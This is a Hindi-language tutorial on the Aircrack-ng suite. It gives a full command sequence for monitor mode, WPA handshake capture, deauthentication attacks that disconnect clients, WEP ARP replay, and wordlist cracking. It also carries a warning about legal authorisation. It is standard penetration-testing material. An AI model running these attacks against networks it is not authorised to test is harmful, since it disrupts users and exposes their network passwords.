📡 Aircrack-ng - WiFi Security Auditing Suite

📶 WiFi Security 🔑 WEP/WPA/WPA2 Cracking 🕵️ Packet Capture

Category: 5️⃣ Wireless Attacks

📝 Description

Aircrack-ng दुनिया का सबसे लोकप्रिय वायरलेस नेटवर्क सिक्योरिटी ऑडिटिंग सुइट है। यह WEP, WPA, और WPA2 WiFi नेटवर्क्स की सुरक्षा जांचने और पासवर्ड क्रैक करने के लिए उपयोग किया जाता है। Aircrack-ng एक पूरा सुइट है जिसमें कई टूल्स शामिल हैं: airmon-ng (मॉनिटर मोड), airodump-ng (पैकेट कैप्चर), aireplay-ng (डिअथेंटिकेशन अटैक), aircrack-ng (पासवर्ड क्रैकिंग), और airdecap-ng (डिक्रिप्शन)।

विशेषता: Aircrack-ng WPA/WPA2 के लिए हैंडशेक कैप्चर करके डिक्शनरी अटैक कर सकता है। WEP नेटवर्क के लिए यह ARP रिप्ले अटैक से तेजी से क्रैक कर सकता है।

📦 Installation

Kali Linux (पहले से इंस्टॉल):

aircrack-ng --help

Ubuntu/Debian:

sudo apt update
sudo apt install aircrack-ng -y

macOS (Homebrew):

brew install aircrack-ng

GitHub से इंस्टॉल:

git clone https://github.com/aircrack-ng/aircrack-ng.git
cd aircrack-ng
./configure
make
sudo make install

💻 Common Commands (उदाहरण सहित)

📌 Aircrack-ng सुइट के मुख्य टूल्स:

🔹 1. वायरलेस इंटरफेस देखना:

iwconfig

👉 उदाहरण: सभी वायरलेस इंटरफेस (जैसे wlan0, wlan1) दिखाता है।

🔹 2. मॉनिटर मोड में डालना:

sudo airmon-ng start wlan0

👉 उदाहरण: wlan0 इंटरफेस को मॉनिटर मोड में डालता है (wlan0mon बन जाता है)।

🔹 3. आसपास के WiFi नेटवर्क स्कैन करना:

sudo airodump-ng wlan0mon

👉 उदाहरण: सभी आसपास के WiFi नेटवर्क्स दिखाता है (BSSID, CHANNEL, ENCRYPTION, ESSID)।

🔹 4. स्पेसिफिक नेटवर्क का हैंडशेक कैप्चर करना:

sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capture wlan0mon

👉 उदाहरण: चैनल 6 पर, BSSID 00:11:22:33:44:55 वाले नेटवर्क का डेटा capture-01.cap फाइल में सेव करता है।

🔹 5. डिअथेंटिकेशन अटैक (हैंडशेक कैप्चर करने के लिए):

sudo aireplay-ng -0 10 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF wlan0mon

👉 उदाहरण: 10 डिअथेंटिकेशन पैकेट भेजता है, जिससे क्लाइंट डिस्कनेक्ट होता है और हैंडशेक कैप्चर होता है।

🔹 6. WPA/WPA2 पासवर्ड क्रैक करना (डिक्शनरी अटैक):

sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

👉 उदाहरण: rockyou.txt वर्डलिस्ट से capture-01.cap फाइल में मौजूद हैंडशेक को क्रैक करता है।

🔹 7. WEP नेटवर्क के लिए ARP रिप्ले अटैक:

sudo aireplay-ng -3 -b 00:11:22:33:44:55 wlan0mon

👉 उदाहरण: ARP रिक्वेस्ट को रीप्ले करके IVs (Initialization Vectors) जनरेट करता है।

🔹 8. WEP पासवर्ड क्रैक करना:

sudo aircrack-ng capture-01.cap

👉 उदाहरण: WEP क्रैकिंग के लिए, 20,000-50,000 IVs चाहिए।

🔹 9. मॉनिटर मोड बंद करना:

sudo airmon-ng stop wlan0mon

👉 उदाहरण: मॉनिटर मोड बंद करके नॉर्मल मोड में लौटता है।

🔹 10. इंटरफेस की जानकारी देखना:

sudo airmon-ng

👉 उदाहरण: सभी वायरलेस इंटरफेस और उनकी स्थिति दिखाता है।

🔹 11. एन्क्रिप्टेड कैप्चर फाइल को डिक्रिप्ट करना:

airdecap-ng -b 00:11:22:33:44:55 -p password capture-01.cap

👉 उदाहरण: पासवर्ड से एन्क्रिप्टेड कैप्चर को डिक्रिप्ट करता है।

🔹 12. कैप्चर फाइल में हैंडशेक है या नहीं चेक करना:

aircrack-ng capture-01.cap | grep "WPA handshake"

👉 उदाहरण: कैप्चर फाइल में WPA हैंडशेक है या नहीं चेक करता है।

🎯 Aircrack-ng सुइट के टूल्स:

airmon-ng: वायरलेस कार्ड को मॉनिटर मोड में डालना
airodump-ng: WiFi नेटवर्क स्कैन और पैकेट कैप्चर
aireplay-ng: पैकेट इंजेक्शन (डिअथेंटिकेशन, ARP रिप्ले)
aircrack-ng: WEP/WPA/WPA2 पासवर्ड क्रैकिंग
airdecap-ng: एन्क्रिप्टेड कैप्चर फाइल को डिक्रिप्ट करना
airserv-ng: वायरलेस कार्ड को रिमोट एक्सेस
airolib-ng: प्री-कंप्यूटेड टेबल्स स्टोर करना

🎯 WPA/WPA2 हैंडशेक कैप्चर करने की पूरी प्रक्रिया:

# 1. मॉनिटर मोड में डालें
sudo airmon-ng start wlan0

# 2. नेटवर्क स्कैन करें और टारगेट चुनें
sudo airodump-ng wlan0mon

# 3. टारगेट नेटवर्क का डेटा कैप्चर करें
sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capture wlan0mon

# 4. दूसरे टर्मिनल में डिअथेंटिकेशन अटैक करें
sudo aireplay-ng -0 5 -a 00:11:22:33:44:55 wlan0mon

# 5. हैंडशेक कैप्चर होने के बाद पासवर्ड क्रैक करें
sudo aircrack-ng -w rockyou.txt capture-01.cap

🎯 Use Cases (उपयोग के तरीके)

WiFi सिक्योरिटी ऑडिट: अपने WiFi नेटवर्क की सुरक्षा जांचना।
WPA/WPA2 पासवर्ड टेस्टिंग: कमजोर पासवर्ड को डिटेक्ट करना।
पेनिट्रेशन टेस्टिंग: वायरलेस नेटवर्क पर सुरक्षा कमजोरियां ढूँढना।
WEP नेटवर्क क्रैकिंग: पुराने WEP एन्क्रिप्शन को क्रैक करना।
फॉरेंसिक जांच: WiFi ट्रैफिक को कैप्चर और एनालिसिस करना।

⚙️ Key Features (मुख्य विशेषताएँ)

✔️ WEP, WPA, WPA2, WPA3 सपोर्ट
✔️ मॉनिटर मोड और पैकेट इंजेक्शन
✔️ हैंडशेक कैप्चर और डिक्शनरी अटैक
✔️ ARP रिप्ले अटैक (WEP के लिए)
✔️ डिअथेंटिकेशन अटैक (Deauthentication Attack)
✔️ क्लाइंट डिस्कवरी और MAC फिल्टर बायपास
✔️ प्री-कंप्यूटेड टेबल्स (Rainbow Tables) सपोर्ट
✔️ क्रॉस-प्लेटफॉर्म (Linux, Windows, macOS)
✔️ ओपन-सोर्स और फ्री

📌 WPA/WPA2 क्रैकिंग के लिए जरूरी शर्तें:

✅ वायरलेस कार्ड पैकेट इंजेक्शन सपोर्ट करता हो
✅ एक क्लाइंट नेटवर्क से कनेक्टेड हो (हैंडशेक कैप्चर के लिए)
✅ एक अच्छी वर्डलिस्ट (जैसे rockyou.txt)
✅ धैर्य (क्रैकिंग में समय लग सकता है)

📌 WEP क्रैकिंग के लिए जरूरी शर्तें:

✅ 20,000-50,000 IVs (Initialization Vectors) चाहिए
✅ ARP रिप्ले अटैक से IVs तेजी से जनरेट होते हैं
✅ WEP क्रैकिंग WPA से बहुत तेज है

🔗 Official Resources

Official Website: https://www.aircrack-ng.org
GitHub Repository: https://github.com/aircrack-ng/aircrack-ng
Documentation: Aircrack-ng Wiki
Compatible Cards: Supported Wireless Cards

🔧 Related Tools (समान उपकरण)

Reaver: WPS PIN ब्रूटफोर्स टूल
Kismet: वायरलेस डिटेक्टर और स्निफर
Wifite: ऑटोमेटेड वायरलेस अटैक टूल
WPA2-Handshaker: हैंडशेक कैप्चर टूल
Hashcat: WPA/WPA2 हैश क्रैकिंग (GPU)

⚠️ Important Note (सावधानी)

Aircrack-ng का उपयोग केवल उन्हीं WiFi नेटवर्क पर करें जिनकी आपको लिखित अनुमति हो। बिना अनुमति के WiFi नेटवर्क स्कैन करना, पैकेट कैप्चर करना, या पासवर्ड क्रैक करना कानूनी अपराध है। हमेशा अपने खुद के WiFi नेटवर्क या बग बाउंटी प्रोग्राम पर ही प्रैक्टिस करें। डिअथेंटिकेशन अटैक से क्लाइंट डिस्कनेक्ट हो सकता है, इसलिए प्रोडक्शन नेटवर्क पर सावधानी से उपयोग करें।